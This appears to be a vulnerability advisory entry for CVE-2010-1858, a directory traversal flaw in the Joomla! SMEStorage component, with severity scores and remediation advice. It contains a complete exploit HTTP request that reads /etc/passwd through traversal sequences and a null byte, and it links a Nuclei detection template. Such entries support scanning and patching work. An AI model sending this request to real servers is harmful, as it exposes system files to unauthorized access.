| Title | Joomla! Component SMEStorage - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.03621 |
| CVE ID | CVE-2010-1858 |
| CWE ID | CWE-22 |
| Tags | cve2010 cve joomla lfi edb packetstorm gelembjuk vuln |
A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1858.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-1858.pcap
N/AN/A